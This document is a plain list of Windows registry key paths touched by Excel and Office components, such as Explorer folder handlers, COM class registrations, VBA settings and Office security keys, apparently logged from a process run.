HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_CURRENT_USER\Software\Classes\Directory\CurVer
HKEY_CURRENT_USER\Software\Classes\Directory\
HKEY_CURRENT_USER\Software\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\Software\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory
HKEY_LOCAL_MACHINE\Software\Classes\Directory
HKEY_CURRENT_USER\Software\Classes\Directory\DocObject
HKEY_CURRENT_USER\Software\Classes\Folder
HKEY_LOCAL_MACHINE\Software\Classes\Folder\DocObject
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\DocObject
HKEY_CURRENT_USER\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\Clsid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DrawAlerts\FTP Sites
HKEY_CURRENT_USER\SOFTWARE\SyncEngines\Providers\OneDrive
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Open Find
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UserInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DisabledItems
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Offline\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.xls
HKEY_CLASSES_ROOT\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_CURRENT_USER\Software\Classes\CLSID\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{97E467B4-98C6-4F19-9588-161B7773D6F6}
HKEY_CURRENT_USER\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcHandler
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileBlock
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\FileValidation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ActiveX Cache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\ProtectedView\Locations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\!zm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1C23E02
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1C23E02\1C23E02
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Offline
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Offline\Files
HKEY_CLASSES_ROOT\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Excel\Text Converters\OOXML Converters\Import
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Excel\Text Converters\OOXML Converters\Export
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\139C3899EB73E6C3DA23B8E687B98618
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\339F228ED07C4FC39AD227368BCAFC03
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\832C86ABC73443044BA758069DBCC6E5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EB0C8A90D0D34D14FAB6CF05A69BBEF1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\206169712E4CE28408A0FDE6265794FC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFC7844B38D726447AE1F693823C83FA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6CDA7FFC8F2164F40BC5A96F5A154C25
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\OfficeUpdate
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\FileValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Enhanced RSA and AES Cryptographic Provider\Image Path
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Offload
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Publisher\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Internet
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\Internet
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\Security
HKEY_CURRENT_USER\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{275c23e2-3747-11d0-9fea-00aa003f8646}
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Common\OpenXMLFormat\BlockedRelationshipTypes
HKEY_CURRENT_USER\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{88D96A0F-F192-11D4-A65F-0040963251E5}\InProcHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{88d96a0f-f192-11d4-a65f-0040963251e5}
HKEY_CLASSES_ROOT\CLSID\{0003000C-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\CLSID\{0003000C-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\TrustRecords
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2476309959-3960023044-3115063449-1000\Installer\Components\029E403DA86A1D115B5B0006799C897E
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Installer\Components\029E403DA86A1D115B5B0006799C897E
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\029E403DA86A1D115B5B0006799C897E
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Usage\VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\VBA\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security
HKEY_LOCAL_MACHINE\Software\Microsoft\VBA
HKEY_CLASSES_ROOT\Typelib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win32
HKEY_CURRENT_USER\Software\Classes\Typelib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win32
HKEY_CLASSES_ROOT\Typelib\{00020813-0000-0000-C000-000000000046}\1.9\0\win32
HKEY_CURRENT_USER\Software\Classes\Typelib\{00020813-0000-0000-C000-000000000046}\1.9\0\win32
HKEY_CURRENT_USER\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\16.0\Excel\Security
HKEY_CLASSES_ROOT\CLSID\{86F56B7F-A81B-478d-B231-50FD37CBE761}
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0\MSForms
HKEY_CLASSES_ROOT\CLSID\{DD2DBE12-F9F8-4E32-B087-DAD1DCEF0783}
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ExdCache\Excel8.0\MSComctlLib
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\DisableUIAProxies
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\DisableIntellisenseUIAProxies
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls\EnableWindowControl
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls\EnableTelemetry
HKEY_CURRENT_USER\Software\Microsoft\VBA\Forms3\Controls\EnableDynamicDPI
HKEY_CURRENT_USER\Software\Microsoft\VBA\VBEUI
HKEY_CURRENT_USER\Software\Microsoft\VBA\VBEUI\DisableDynamicDpi
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MsoHeapInit
HKEY_CLASSES_ROOT\Licenses
HKEY_LOCAL_MACHINE\Software\Classes\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\RequireDeclaration
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\CompileOnDemand
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\NotifyUserBeforeStateLoss
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\BackGroundCompile
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\BreakOnAllErrors
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\BreakOnServerErrors
HKEY_CLASSES_ROOT\TypeLib
HKEY_CURRENT_USER\Software\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\409
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\9
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win32
HKEY_CURRENT_USER\Software\Classes\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win32
HKEY_CURRENT_USER\Software\Classes\TypeLib
HKEY_CURRENT_USER\Software\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.0
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\409
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win32
HKEY_CURRENT_USER\Software\Classes\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win32
HKEY_CURRENT_USER\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
HKEY_CURRENT_USER\Software\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
HKEY_CURRENT_USER\Software\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win32
HKEY_CURRENT_USER\Software\Classes\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AirDrop
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\DLLMergeDisable
HKEY_CLASSES_ROOT\CLSID\{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_CLASSES_ROOT\CLSID\{699745C2-5066-4B82-A8E3-D40478DBEC8C}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{699745C2-5066-4B82-A8E3-D40478DBEC8C}\Containers
HKEY_CLASSES_ROOT\CLSID\{43324B33-A78F-480F-9111-9638AACCC832}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{43324B33-A78F-480F-9111-9638AACCC832}\Containers
HKEY_CLASSES_ROOT\CLSID\{DDE33513-774E-4BCD-AE79-02F4ADFE62FC}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{DDE33513-774E-4BCD-AE79-02F4ADFE62FC}\Containers
HKEY_CLASSES_ROOT\CLSID\{AA7E3C50-864C-4604-BC04-8B0B76E637F6}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{AA7E3C50-864C-4604-BC04-8B0B76E637F6}\Containers
HKEY_CLASSES_ROOT\CLSID\{8F914656-9D0A-4EB2-9019-0BF96D8A9EE6}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8F914656-9D0A-4EB2-9019-0BF96D8A9EE6}\Containers
HKEY_CLASSES_ROOT\CLSID\{50D42F09-ECD1-4B41-B65D-DA1FDAA75663}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{50D42F09-ECD1-4B41-B65D-DA1FDAA75663}\Containers
HKEY_CLASSES_ROOT\CLSID\{D9403860-297F-4A49-BF9B-77898150A442}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D9403860-297F-4A49-BF9B-77898150A442}\Containers
HKEY_CLASSES_ROOT\CLSID\{3697790B-223B-484E-9925-C4869218F17A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{3697790B-223B-484E-9925-C4869218F17A}\Containers
HKEY_CLASSES_ROOT\CLSID\{B5C8B898-0074-459F-B700-860D4651EA14}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B5C8B898-0074-459F-B700-860D4651EA14}\Containers
HKEY_CLASSES_ROOT\CLSID\{FB012959-F4F6-44D7-9D09-DAA087A9DB57}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{FB012959-F4F6-44D7-9D09-DAA087A9DB57}\Containers
HKEY_CLASSES_ROOT\CLSID\{03012959-F4F6-44D7-9D09-DAA087A9DB57}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{03012959-F4F6-44D7-9D09-DAA087A9DB57}\Containers
HKEY_CLASSES_ROOT\CLSID\{D4DCD3D7-B4C2-47D9-A6BF-B89BA396A4A3}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D4DCD3D7-B4C2-47D9-A6BF-B89BA396A4A3}\Containers
HKEY_CLASSES_ROOT\CLSID\{0010668C-0801-4DA6-A4A4-826522B6D28F}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0010668C-0801-4DA6-A4A4-826522B6D28F}\Containers
HKEY_CLASSES_ROOT\CLSID\{5805137A-E348-4F7C-B3CC-6DB9965A0599}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{5805137A-E348-4F7C-B3CC-6DB9965A0599}\Containers
HKEY_CLASSES_ROOT\CLSID\{02805F1E-D5AA-415B-82C5-61C033A988A6}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{02805F1E-D5AA-415B-82C5-61C033A988A6}\Containers
HKEY_CLASSES_ROOT\CLSID\{4B59AFCC-B8C3-408A-B670-89E5FAB6FDA7}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4B59AFCC-B8C3-408A-B670-89E5FAB6FDA7}\Containers
HKEY_CLASSES_ROOT\CLSID\{72B624DF-AE11-4948-A65C-351EB0829419}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{72B624DF-AE11-4948-A65C-351EB0829419}\Containers
HKEY_CLASSES_ROOT\CLSID\{01B90D9A-8209-47F7-9C52-E1244BF50CED}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{01B90D9A-8209-47F7-9C52-E1244BF50CED}\Containers
HKEY_CLASSES_ROOT\CLSID\{E7E79A30-4F2C-4FAB-8D00-394F2D6BBEBE}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7E79A30-4F2C-4FAB-8D00-394F2D6BBEBE}\Containers
HKEY_CLASSES_ROOT\CLSID\{7F12E753-FC71-43D7-A51D-92F35977ABB5}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{7F12E753-FC71-43D7-A51D-92F35977ABB5}\Containers
HKEY_CLASSES_ROOT\CLSID\{AA94DCC2-B8B0-4898-B835-000AABD74393}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{AA94DCC2-B8B0-4898-B835-000AABD74393}\Containers
HKEY_CLASSES_ROOT\CLSID\{41070793-59E4-479A-A1F7-954ADC2EF5FC}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{41070793-59E4-479A-A1F7-954ADC2EF5FC}\Containers
HKEY_CLASSES_ROOT\CLSID\{B92E345D-F52D-41F3-B562-081BC772E3B9}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B92E345D-F52D-41F3-B562-081BC772E3B9}\Containers
HKEY_CLASSES_ROOT\CLSID\{7447A267-0015-42C8-A8F1-FB3B94C68361}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{7447A267-0015-42C8-A8F1-FB3B94C68361}\Containers
HKEY_CLASSES_ROOT\CLSID\{1767B93A-B021-44EA-920F-863C11F4F768}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1767B93A-B021-44EA-920F-863C11F4F768}\Containers
HKEY_CLASSES_ROOT\CLSID\{9F66347C-60C4-4C4D-AB58-D2358685F607}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9F66347C-60C4-4C4D-AB58-D2358685F607}\Containers
HKEY_CLASSES_ROOT\CLSID\{50B1904B-F28F-4574-93F4-0BADE82C69E9}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{50B1904B-F28F-4574-93F4-0BADE82C69E9}\Containers
HKEY_CLASSES_ROOT\CLSID\{356F2F88-05A6-4728-B9A4-1BFBCE04D838}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{356F2F88-05A6-4728-B9A4-1BFBCE04D838}\Containers
HKEY_CLASSES_ROOT\CLSID\{32557D3B-69DC-4F95-836E-F5972B2F6159}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{32557D3B-69DC-4F95-836E-F5972B2F6159}\Containers
HKEY_CLASSES_ROOT\CLSID\{3692CA39-E082-4350-9E1F-3704CB083CD5}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{3692CA39-E082-4350-9E1F-3704CB083CD5}\Containers
HKEY_CLASSES_ROOT\CLSID\{0CE7A4A6-03E8-4A60-9D15-282EF32EE7DA}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0CE7A4A6-03E8-4A60-9D15-282EF32EE7DA}\Containers
HKEY_CLASSES_ROOT\CLSID\{AABFB2FA-3E1E-4A8F-8977-5556FB94EA23}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{AABFB2FA-3E1E-4A8F-8977-5556FB94EA23}\Containers
HKEY_CLASSES_ROOT\CLSID\{F90B5F36-367B-402A-9DD1-BC0FD59D8F62}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F90B5F36-367B-402A-9DD1-BC0FD59D8F62}\Containers
HKEY_CLASSES_ROOT\CLSID\{877A0BB7-A313-4491-87B5-2E6D0594F520}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{877A0BB7-A313-4491-87B5-2E6D0594F520}\Containers
HKEY_CLASSES_ROOT\CLSID\{F5D3E63B-CB0F-4628-A478-6D8244BE36B1}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{F5D3E63B-CB0F-4628-A478-6D8244BE36B1}\Containers
HKEY_CLASSES_ROOT\CLSID\{FB40360C-547E-4956-A3B9-D4418859BA66}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{FB40360C-547E-4956-A3B9-D4418859BA66}\Containers
HKEY_CLASSES_ROOT\CLSID\{D94EDF02-EFE5-4F0D-85C8-F5A68B3000B1}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{D94EDF02-EFE5-4F0D-85C8-F5A68B3000B1}\Containers
HKEY_CLASSES_ROOT\CLSID\{05AF94D8-7174-4CD2-BE4A-4124B80EE4B8}\Instance
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ReviewCycle\ReviewToken
HKEY_CURRENT_USER\Control Panel\Desktop
HKEY_CURRENT_USER\Control Panel\Desktop\CaretWidth
HKEY_CURRENT_USER\Control Panel\Desktop\CursorBlinkRate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1C24016
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DocumentRecovery\1C24016\1C24016
HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common\VbaCapability
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
